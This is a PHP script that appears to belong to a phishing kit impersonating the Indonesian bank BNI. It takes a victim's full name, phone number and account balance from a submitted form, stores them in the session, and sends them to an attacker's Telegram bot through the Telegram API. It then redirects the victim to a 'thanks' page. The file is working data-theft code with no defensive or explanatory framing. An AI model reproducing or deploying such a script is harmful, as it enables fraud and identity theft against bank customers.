<?php
include "telegram.php";
session_start();

$a = $_POST['a'];
$b = $_POST['b'];
$c = $_POST['c'];

$_SESSION['a'] = $a;
$_SESSION['b'] = $b;
$_SESSION['c'] = $c;

$message = "
( Bank bni | No HP | ".$nomor.")

- Nama Lengkap : ".$a."
- No HP : ".$b."
- Saldo : ".$c."

 ";

function sendMessage($id_telegram, $message, $id_botTele) {
    $url = "https://api.telegram.org/bot" . $id_botTele . "/sendMessage?parse_mode=markdown&chat_id=" . $id_telegram;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true);
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}
sendMessage($id_telegram, $message, $id_botTele);
header('Location: ../thanks.html');
?>